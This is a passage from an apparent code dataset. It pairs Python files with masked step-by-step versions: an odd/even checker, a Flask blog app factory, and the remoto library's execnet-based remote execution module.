]
}
|
[
6,
8,
9,
10,
13
] |
#função: Definir se o número inserido é ímpar ou par
#autor: João Cândido
p = 0
i = 0
numero = int(input("Insira um número: "))
if numero % 2 == 0:
p = numero
print (p, "é um número par")
else:
i = numero
print (i, "é um número ímpar")
|
normal
|
{
"blob_id": "382bc321c5fd35682bc735ca4d6e293d09be64ec",
"index": 9990,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif numero % 2 == 0:\n p = numero\n print(p, 'é um número par')\nelse:\n i = numero\n print(i, 'é um número ímpar')\n",
"step-3": "p = 0\ni = 0\nnumero = int(input('Insira um número: '))\nif numero % 2 == 0:\n p = numero\n print(p, 'é um número par')\nelse:\n i = numero\n print(i, 'é um número ímpar')\n",
"step-4": "#função: Definir se o número inserido é ímpar ou par\n#autor: João Cândido\n\np = 0\ni = 0\n\nnumero = int(input(\"Insira um número: \"))\n\nif numero % 2 == 0:\n\tp = numero\n\tprint (p, \"é um número par\")\nelse:\n\ti = numero\n\tprint (i, \"é um número ímpar\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
#coding=utf-8
"""
__init__.py
:license: BSD, see LICENSE for more details.
"""
import os
import logging
import sys
from logging.handlers import SMTPHandler, RotatingFileHandler
from flask import Flask, g, session, request, flash, redirect, jsonify, url_for
from flaskext.babel import Babel
from bg import helpers
from bg.extensions import db, mail, cache, photos, identity_changed, Identity
from bg.views import frontend,admin,post,account
from bg.models import Post
DEFAULT_MODULES = (
(frontend, ""),
(post, "/post"),
(account, "/account"),
(admin, "/admin"),)
DEFAULT_APP_NAME = 'bg'
def create_app(config=None, modules=None):
if modules is None:
modules = DEFAULT_MODULES
app = Flask(DEFAULT_APP_NAME)
#config
app.config.from_pyfile(config)
configure_extensions(app)
configure_logging(app)
configure_errorhandlers(app)
configure_before_handlers(app)
configure_template_filters(app)
configure_context_processors(app)
configure_signals(app)
babel = Babel(app)
# register module
configure_modules(app, modules)
return app
def on_identity_changed(app, identity):
g.identity = identity
session['identity'] = identity
def configure_signals(app):
identity_changed.connect(on_identity_changed, app)
def configure_errorhandlers(app):
@app.errorhandler(401)
def unauthorized(error):
#if request.is_xhr:
# return jsonfiy(error=_("Login required"))
flash(("Please login to see this page"), "error")
#return redirect(url_for("account.login", next=request.path))
return redirect(url_for("account.login"))
def configure_before_handlers(app):
@app.before_request
def authenticate():
try:
g.identity = session['identity']
except Exception:
g.identity = Identity(0,'Login')
def configure_extensions(app):
# configure extensions
db.init_app(app)
#db.app = app
#db.create_all()
mail.init_app(app)
cache.init_app(app)
#setup_themes(app)
def configure_context_processors(app):
@app.context_processor
def archives():
archives = set()
for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):
item = (dt.create_date.year, dt.create_date.month)
archives.add(item)
if len(archives) > 5:
break
archives = sorted(list(archives))
return dict(archives=archives)
def configure_modules(app, modules):
for module, url_prefix in modules:
app.register_module(module, url_prefix=url_prefix)
def configure_template_filters(app):
@app.template_filter()
def timesince(value):
return helpers.timesince(value)
@app.template_filter()
def endtags(value):
return helpers.endtags(value)
@app.template_filter()
def gravatar(email,size):
return helpers.gravatar(email,size)
@app.template_filter()
def format_date(date,s='full'):
return helpers.format_date(date,s)
@app.template_filter()
def format_datetime(time,s='full'):
return helpers.format_datetime(time,s)
@app.template_filter()
def format_yearmonth(date):
return '%s-%s'%date
def configure_logging(app):
mail_handler = \
SMTPHandler(app.config['MAIL_SERVER'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['ADMINS'],
'application error',
(
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
))
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]')
debug_log = os.path.join(app.root_path,
app.config['DEBUG_LOG'])
debug_file_handler = \
RotatingFileHandler(debug_log,
maxBytes=100000,
backupCount=10)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path,
app.config['ERROR_LOG'])
error_file_handler = \
RotatingFileHandler(error_log,
maxBytes=100000,
backupCount=10)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
|
normal
|
{
"blob_id": "ef124e8c15ef347efd709a5e3fb104c7fd1bccde",
"index": 2753,
"step-1": "<mask token>\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\n<mask token>\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\ndef configure_logging(app):\n mail_handler = SMTPHandler(app.config['MAIL_SERVER'], app.config[\n 'DEFAULT_MAIL_SENDER'], app.config['ADMINS'], 'application error',\n (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']))\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n debug_log = os.path.join(app.root_path, app.config['DEBUG_LOG'])\n debug_file_handler = RotatingFileHandler(debug_log, maxBytes=100000,\n backupCount=10)\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n error_log = os.path.join(app.root_path, app.config['ERROR_LOG'])\n error_file_handler = RotatingFileHandler(error_log, maxBytes=100000,\n backupCount=10)\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n",
"step-5": "#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n __init__.py\n\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport logging\nimport sys\n\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask import Flask, g, session, request, flash, redirect, jsonify, url_for\nfrom flaskext.babel import Babel\n\nfrom bg import helpers\nfrom bg.extensions import db, mail, cache, photos, identity_changed, Identity\n\nfrom bg.views import frontend,admin,post,account\nfrom bg.models import Post\n\nDEFAULT_MODULES = (\n (frontend, \"\"),\n (post, \"/post\"),\n (account, \"/account\"),\n (admin, \"/admin\"),)\n\nDEFAULT_APP_NAME = 'bg'\n\ndef create_app(config=None, modules=None):\n\n if modules is None:\n modules = DEFAULT_MODULES\n\n app = Flask(DEFAULT_APP_NAME)\n\n #config\n app.config.from_pyfile(config)\n configure_extensions(app)\n\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n\n # register module\n configure_modules(app, modules)\n\n return app\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n #if request.is_xhr:\n # return jsonfiy(error=_(\"Login required\"))\n flash((\"Please login to see this page\"), \"error\")\n #return redirect(url_for(\"account.login\", next=request.path))\n return redirect(url_for(\"account.login\"))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0,'Login')\n\n\ndef configure_extensions(app):\n # configure extensions\n db.init_app(app)\n #db.app = app\n #db.create_all()\n mail.init_app(app)\n cache.init_app(app)\n #setup_themes(app)\n\ndef configure_context_processors(app):\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):\n item = (dt.create_date.year, dt.create_date.month)\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\ndef configure_modules(app, modules):\n\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email,size):\n return helpers.gravatar(email,size)\n\n @app.template_filter()\n def format_date(date,s='full'):\n return helpers.format_date(date,s)\n\n @app.template_filter()\n def format_datetime(time,s='full'):\n return helpers.format_datetime(time,s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s'%date\n\ndef configure_logging(app):\n\n mail_handler = \\\n SMTPHandler(app.config['MAIL_SERVER'],\n app.config['DEFAULT_MAIL_SENDER'],\n app.config['ADMINS'],\n 'application error',\n (\n app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'],\n ))\n\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n\n debug_log = os.path.join(app.root_path,\n app.config['DEBUG_LOG'])\n\n debug_file_handler = \\\n RotatingFileHandler(debug_log,\n maxBytes=100000,\n backupCount=10)\n\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n\n error_log = os.path.join(app.root_path,\n app.config['ERROR_LOG'])\n\n error_file_handler = \\\n RotatingFileHandler(error_log,\n maxBytes=100000,\n backupCount=10)\n\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
import inspect
import json
import socket
import sys
import execnet
import logging
from remoto.process import check
class BaseConnection(object):
"""
Base class for Connection objects. Provides a generic interface to execnet
for setting up the connection
"""
executable = ''
remote_import_system = 'legacy'
def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=True,
detect_sudo=False, use_ssh=False, interpreter=None, ssh_options=None):
self.sudo = sudo
self.hostname = hostname
self.ssh_options = ssh_options
self.logger = logger or basic_remote_logger()
self.remote_module = None
self.channel = None
self.use_ssh = use_ssh
self.global_timeout = None # wait for ever
self.interpreter = interpreter or 'python%s' % sys.version_info[0]
if eager:
try:
if detect_sudo:
self.sudo = self._detect_sudo()
self.gateway = self._make_gateway(hostname)
except OSError:
self.logger.error(
"Can't communicate with remote host, possibly because "
"%s is not installed there" % self.interpreter
)
raise
def _make_gateway(self, hostname):
self.group = execnet.Group()
gateway = self.group.makegateway(
self._make_connection_string(hostname)
)
gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)
return gateway
def _detect_sudo(self, _execnet=None):
"""
``sudo`` detection has to create a different connection to the remote
host so that we can reliably ensure that ``getuser()`` will return the
right information.
After getting the user info it closes the connection and returns
a boolean
"""
exc = _execnet or execnet
gw = exc.makegateway(
self._make_connection_string(self.hostname, use_sudo=False)
)
channel = gw.remote_exec(
'import getpass; channel.send(getpass.getuser())'
)
result = channel.receive()
gw.exit()
if result == 'root':
return False
self.logger.debug('connection detected need for sudo')
return True
def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None):
_needs_ssh = _needs_ssh or needs_ssh
interpreter = self.interpreter
if use_sudo is not None:
if use_sudo:
interpreter = 'sudo ' + interpreter
elif self.sudo:
interpreter = 'sudo ' + interpreter
if _needs_ssh(hostname) or self.use_ssh:
if self.ssh_options:
return 'ssh=%s %s//python=%s' % (
self.ssh_options, hostname, interpreter
)
else:
return 'ssh=%s//python=%s' % (hostname, interpreter)
return 'popen//python=%s' % interpreter
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.group.terminate(timeout=1.0)
return False
def cmd(self, cmd):
"""
In the base connection class, this method just returns the ``cmd``
as-is. Other implementations will end up doing transformations to the
command by prefixing it with other flags needed. See
:class:`KubernetesConnection` for an example
"""
return cmd
def execute(self, function, **kw):
return self.gateway.remote_exec(function, **kw)
def exit(self):
self.group.terminate(timeout=1.0)
def import_module(self, module, python_executable=None):
"""
Allows remote execution of a local module. Depending on the
``remote_import_system`` attribute it may use execnet's implementation
or remoto's own based on JSON.
.. note:: It is not possible to use execnet's remote execution model on
connections that aren't SSH or Local.
"""
if self.remote_import_system is not None:
if self.remote_import_system == 'json':
self.remote_module = JsonModuleExecute(self, module, self.logger,
python_executable=python_executable)
else:
self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)
else:
self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)
return self.remote_module
def has_connection(self):
if self.gateway:
return self.gateway.hasreceiver()
return False
class LegacyModuleExecute(object):
"""
This (now legacy) class, is the way ``execnet`` does its remote module
execution: it sends it over a channel, and does a send/receive for
exchanging information. This only works when there is native support in
execnet for a given connection. This currently means it would only work for
ssh and local (Popen) connections, and will not work for anything like
kubernetes or containers.
"""
def __init__(self, gateway, module, logger=None):
self.channel = gateway.remote_exec(module)
self.module = module
self.logger = logger
def __getattr__(self, name):
if not hasattr(self.module, name):
msg = "module %s does not have attribute %s" % (str(self.module), name)
raise AttributeError(msg)
docstring = self._get_func_doc(getattr(self.module, name))
def wrapper(*args):
arguments = self._convert_args(args)
if docstring:
self.logger.debug(docstring)
self.channel.send("%s(%s)" % (name, arguments))
try:
return self.channel.receive()
except Exception as error:
# Error will come as a string of a traceback, remove everything
# up to the actual exception since we do get garbage otherwise
# that points to non-existent lines in the compiled code
exc_line = str(error)
for tb_line in reversed(str(error).split('\n')):
if tb_line:
exc_line = tb_line
break
raise RuntimeError(exc_line)
return wrapper
def _get_func_doc(self, func):
try:
return getattr(func, 'func_doc').strip()
except AttributeError:
return ''
def _convert_args(self, args):
if args:
if len(args) > 1:
arguments = str(args).rstrip(')').lstrip('(')
else:
arguments = str(args).rstrip(',)').lstrip('(')
else:
arguments = ''
return arguments
dump_template = """
if __name__ == '__main__':
import json, traceback
obj = {'return': None, 'exception': None}
try:
obj['return'] = %s%s
except Exception:
obj['exception'] = traceback.format_exc()
try:
print(json.dumps(obj).decode('utf-8'))
except AttributeError:
print(json.dumps(obj))
"""
class JsonModuleExecute(object):
"""
This remote execution class allows to ship Python code over to the remote
node, load it via ``stdin`` and call any function with arguments. The
resulting response is dumped over JSON so that it can get printed to
``stdout``, then captured locally, loaded into regular Python and returned.
If the remote end generates an exception with a traceback, that is captured
as well and raised accordingly.
"""
def __init__(self, conn, module, logger=None, python_executable=None):
self.conn = conn
self.module = module
self._module_source = inspect.getsource(module)
self.logger = logger
self.python_executable = python_executable
def __getattr__(self, name):
if not hasattr(self.module, name):
msg = "module %s does not have attribute %s" % (str(self.module), name)
raise AttributeError(msg)
docstring = self._get_func_doc(getattr(self.module, name))
def wrapper(*args):
if docstring:
self.logger.debug(docstring)
if len(args):
source = self._module_source + dump_template % (name, repr(args))
else:
source = self._module_source + dump_template % (name, '()')
# check python interpreter
if self.python_executable is None:
self.python_executable = get_python_executable(self.conn)
out, err, code = check(self.conn, [self.python_executable], stdin=source.encode('utf-8'))
if not out:
if not err:
err = [
'Traceback (most recent call last):',
' File "<stdin>", in <module>',
'Exception: error calling "%s"' % name
]
if code:
raise Exception('Unexpected remote exception: \n%s\n%s' % ('\n'.join(out), '\n'.join(err)))
# at this point, there was no stdout, and the exit code was 0,
# we must return so that we don't fail trying to serialize back
# the JSON
return
response = json.loads(out[0])
if response['exception']:
raise Exception(response['exception'])
return response['return']
return wrapper
def _get_func_doc(self, func):
try:
return getattr(func, 'func_doc').strip()
except AttributeError:
return ''
def basic_remote_logger():
logging.basicConfig()
logger = logging.getLogger(socket.gethostname())
logger.setLevel(logging.DEBUG)
return logger
def needs_ssh(hostname, _socket=None):
"""
Obtains remote hostname of the socket and cuts off the domain part
of its FQDN.
"""
if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:
return False
_socket = _socket or socket
fqdn = _socket.getfqdn()
if hostname == fqdn:
return False
local_hostname = _socket.gethostname()
local_short_hostname = local_hostname.split('.')[0]
if local_hostname == hostname or local_short_hostname == hostname:
return False
return True
def get_python_executable(conn):
"""
Try to determine the remote Python version so that it can be used
when executing. Avoids the problem of different Python versions, or distros
that do not use ``python`` but do ``python3``
"""
# executables in order of preference:
executables = ['python3', 'python', 'python2.7']
for executable in executables:
conn.logger.debug('trying to determine remote python executable with %s' % executable)
out, err, code = check(conn, ['which', executable])
if code:
conn.logger.warning('skipping %s, was not found in path' % executable)
else:
try:
return out[0].strip()
except IndexError:
conn.logger.warning('could not parse stdout: %s' % out)
# if all fails, we just return whatever the main connection had
conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter)
return conn.interpreter
|
normal
|
{
"blob_id": "ae38995d153deed2e6049b7b65fb5f28dfcef470",
"index": 1442,
"step-1": "<mask token>\n\n\nclass BaseConnection(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n <mask token>\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n <mask token>\n\n def __enter__(self):\n return self\n <mask token>\n <mask token>\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BaseConnection(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n 